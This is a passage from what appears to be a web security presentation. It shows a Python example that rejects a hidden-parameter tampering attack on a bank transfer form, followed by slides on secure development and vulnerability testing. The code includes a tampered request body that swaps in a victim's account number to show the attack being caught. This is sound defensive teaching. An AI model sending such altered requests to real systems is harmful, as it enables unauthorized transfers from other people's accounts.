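As an added example (not code from the presentation), here is server-side handling for the xferconfirm.asp request from the hidden parameter slides. The two form bodies are the ones shown on the slides; the session table, the account ownership and the user names are constructed. The point is that the posted fromAcct is checked against what the session's user actually owns, instead of being trusted because it came from a hidden field.

```python
# Added example (not from the slides): server-side handling of the
# xferconfirm.asp transfer request. The two form bodies are the ones shown on
# the "Hidden Parameters – The Hack" slide; the session table, account
# ownership and user names are constructed. The posted fromAcct is checked
# against what the session's user actually owns.
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed: the slide's session cookie value -> logged-in user; accounts owned per user.
SESSIONS = {"AJPFJELCAAEFJOPKCAJFIFBM": "HE"}
ACCOUNTS = {
    "HE": {"120199789890"},
    "IC": {"18822281934"},
    "victim": {"44797501008896675"},
}

BODY_BEFORE = ("fromAcct=120199789890&toAcct=18822281934&amount=2000.00"
               "&memo=From+HE+to+IC&Enter=Preview+Transfer")
BODY_AFTER = ("fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00"
              "&memo=From+HE+to+IC&Enter=Preview+Transfer")


def single(fields: dict, name: str):
    """Exactly one value, or None: a duplicated field is tampering, not a choice."""
    values = fields.get(name, [])
    return values[0] if len(values) == 1 else None


def parse_amount(text):
    """Positive, at most two decimal places; anything else is rejected."""
    try:
        amount = Decimal(text)
    except (InvalidOperation, TypeError):
        return None
    if amount <= 0 or amount.as_tuple().exponent < -2:
        return None
    return amount


def handle_transfer(session_id: str, body: str) -> dict:
    """Validate every field of the POST body and authorize it against the session."""
    user = SESSIONS.get(session_id)
    if user is None:
        return {"ok": False, "error": "no valid session"}

    fields = parse_qs(body, keep_blank_values=True)
    from_acct = single(fields, "fromAcct")
    to_acct = single(fields, "toAcct")
    amount = parse_amount(single(fields, "amount"))
    if from_acct is None or to_acct is None or amount is None:
        return {"ok": False, "error": "malformed request"}

    # The authorization check the vulnerable page lacked: the hidden fromAcct
    # must belong to the user the session cookie identifies.
    if from_acct not in ACCOUNTS.get(user, set()):
        return {"ok": False, "error": "fromAcct not owned by " + user}
    if not any(to_acct in owned for owned in ACCOUNTS.values()):
        return {"ok": False, "error": "unknown toAcct"}

    return {"ok": True, "user": user, "from": from_acct, "to": to_acct, "amount": str(amount)}


if __name__ == "__main__":
    print(handle_transfer("AJPFJELCAAEFJOPKCAJFIFBM", BODY_BEFORE))
    print(handle_transfer("AJPFJELCAAEFJOPKCAJFIFBM", BODY_AFTER))
```

The same check would have stopped the Victoria's Secret and Gateway incidents listed earlier: in each case an identifier the client supplied (in the URL or a cookie) was used to select data without confirming that the authenticated user was entitled to it.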

PART 6

Managing and Detecting Web Application Vulnerabilities

• Building a secure development process
• Web application ROI
• Detecting web application vulnerabilities
• Managing and addressing web application security risk throughout the enterprise

Application Lifecycle Phases

Phases: Design -> Development -> Testing -> Production

Who is involved at each phase: Developers; QA and Developers; Security Operations and Auditors; Auditors, Dev, and Business Subject Matter Experts (SME)

Managing Web Application Security Risk

Educate the development team.

Develop and publish best practices.

Develop secure code

Test and verify that code is developed securely

Perform routine audits of production systems.

Establish remediation procedures.

Keep track of security trends.

Bring security to the development team…

Detecting Web Application Vulnerabilities: Manual vs. Automatic Testing

Manual testing:
• Time consuming
• Expensive
• Not repeatable
• Relies on third party individuals (penetration testers)

Automated testing:
• High performance, automated web application assessment
• Cost effective
• Scalable throughout entire application lifecycle
• Consistent high quality assessments
• Provides economy of scale (SPI Labs)
• Customizable (Custom Agents)

Q&A

Questions?